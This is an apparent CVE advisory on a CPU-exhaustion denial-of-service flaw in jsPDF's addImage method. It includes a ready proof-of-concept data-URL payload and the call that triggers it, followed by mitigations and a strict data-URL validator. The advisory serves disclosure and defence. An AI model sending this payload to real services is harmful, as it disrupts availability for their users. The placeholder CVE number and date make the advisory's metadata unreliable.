jsPDF, Denial of Service (DoS), CVE-2023-XXXX (Critical)

How the CVE Works:

The vulnerability in jsPDF arises from insufficient validation of user-supplied input in the `addImage` method. When an attacker passes a maliciously crafted data URL as the first argument to `addImage`, parsing it consumes excessive CPU time, resulting in a denial of service (DoS). The payload exploits the library's failure to handle large or malformed data URLs safely, causing the application to hang or crash. The `html` and `addSvgAsImage` methods are also affected, since they likewise fail to sanitize their input and so expose the same attack vector. The example payload below shows how a crafted data URL triggers the problem and causes severe performance degradation.

DailyCVE Form:

Platform: jsPDF
Version: <3.0.1
Vulnerability: DoS via CPU exhaustion
Severity: Critical
Date: 2023-XX-XX

What Undercode Says:

Exploitation:

  1. Craft Malicious Payload: Create a data URL with excessive or malformed content.
    const payload = 'data:/charset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=s\x00base64,undefined';
    

  2. Trigger Vulnerability: Pass the payload to `addImage`.
    const { jsPDF } = require('jspdf');
    const doc = new jsPDF();
    doc.addImage(payload, "PNG", 10, 40, 180, 180, undefined, "SLOW");
    
  3. Observe CPU Spike: Monitor CPU usage to confirm exploitation.

Protection:

  1. Upgrade jsPDF: Ensure the library is updated to version 3.0.1 or later.
    npm install jspdf@latest
    
  2. Input Sanitization: Validate and sanitize all user-supplied URLs before processing.
    function sanitizeURL(url) {
      // Accept only image data URLs; reject everything else before it reaches addImage
      if (!url.startsWith('data:image/')) throw new Error('Invalid URL');
      return url;
    }
    
  3. Rate Limiting: Implement rate limiting to mitigate DoS attacks.
    const express = require('express');
    const rateLimit = require('express-rate-limit');
    const app = express();
    // At most 100 requests per client in each 15-minute window
    const limiter = rateLimit({ windowMs: 15 * 60 * 1000, max: 100 });
    app.use(limiter);
    
  4. Monitoring: Use monitoring tools to detect abnormal CPU usage.
    top -o %CPU
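The prefix check in step 2 only inspects the start of the string; everything after `data:image/` still reaches the library's data-URL parser. The following added example (not code from this advisory or from the jsPDF project) shows a stricter gate to place in front of `addImage`: it bounds the total length, splits the data URL at its first comma, requires the header to be exactly `<mime>;base64` with the MIME type on an allowlist, and checks the body against a plain base64 character class, so no backtracking-prone pattern ever runs over attacker-controlled input. The names `validateImageDataUrl`, `safeAddImage` and `MAX_DATA_URL_LENGTH`, and the 10 MiB limit, are this example's own assumptions.

```javascript
// Added example: strict, linear-time validation of image data URLs before
// they are handed to jsPDF's addImage(). Not part of the original advisory
// or the jsPDF project; all names and limits here are assumptions.

const MAX_DATA_URL_LENGTH = 10 * 1024 * 1024; // assumed policy: 10 MiB cap
const ALLOWED_MIME = new Set(['image/png', 'image/jpeg', 'image/webp']);

// A single anchored character class matches in linear time, so a large or
// odd body cannot make this check expensive.
const BASE64_BODY = /^[A-Za-z0-9+/]+={0,2}$/;

function validateImageDataUrl(url) {
  if (typeof url !== 'string') {
    return { ok: false, reason: 'not a string' };
  }
  if (url.length > MAX_DATA_URL_LENGTH) {
    return { ok: false, reason: 'data URL exceeds size limit' };
  }
  if (!url.startsWith('data:')) {
    return { ok: false, reason: 'not a data URL' };
  }
  // Split header from body at the first comma; no regex runs over the whole string.
  const comma = url.indexOf(',');
  if (comma === -1) {
    return { ok: false, reason: 'missing comma separator' };
  }
  const header = url.slice(5, comma);
  const body = url.slice(comma + 1);
  // The header must be exactly "<mime>;base64". Extra parameters such as
  // repeated "charset=" segments, or stray control bytes, are rejected here.
  const parts = header.split(';');
  if (parts.length !== 2 || parts[1].toLowerCase() !== 'base64') {
    return { ok: false, reason: 'header must be <mime>;base64' };
  }
  const mime = parts[0].toLowerCase();
  if (!ALLOWED_MIME.has(mime)) {
    return { ok: false, reason: `unsupported image type ${mime}` };
  }
  if (body.length === 0 || body.length % 4 !== 0 || !BASE64_BODY.test(body)) {
    return { ok: false, reason: 'body is not valid base64' };
  }
  return { ok: true, mime, body };
}

// Wrapper that refuses to call addImage on anything the validator rejects.
function safeAddImage(doc, url, format, x, y, w, h) {
  const result = validateImageDataUrl(url);
  if (!result.ok) {
    throw new Error(`rejected image input: ${result.reason}`);
  }
  return doc.addImage(url, format, x, y, w, h);
}

module.exports = { validateImageDataUrl, safeAddImage, MAX_DATA_URL_LENGTH };
```

Pair this with the library upgrade rather than instead of it: the validator limits what user input can reach the parser, while the upgrade fixes the parser itself.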
    

Analytics:

  • Affected Versions: All versions of jsPDF prior to 3.0.1.
  • Attack Vector: Remote, via crafted data URLs.
  • Impact: High CPU utilization leading to DoS.
  • Mitigation Difficulty: Low (upgrade and sanitize inputs).

References:

Reported By: https://github.com/advisories/GHSA-w532-jxjh-hjhj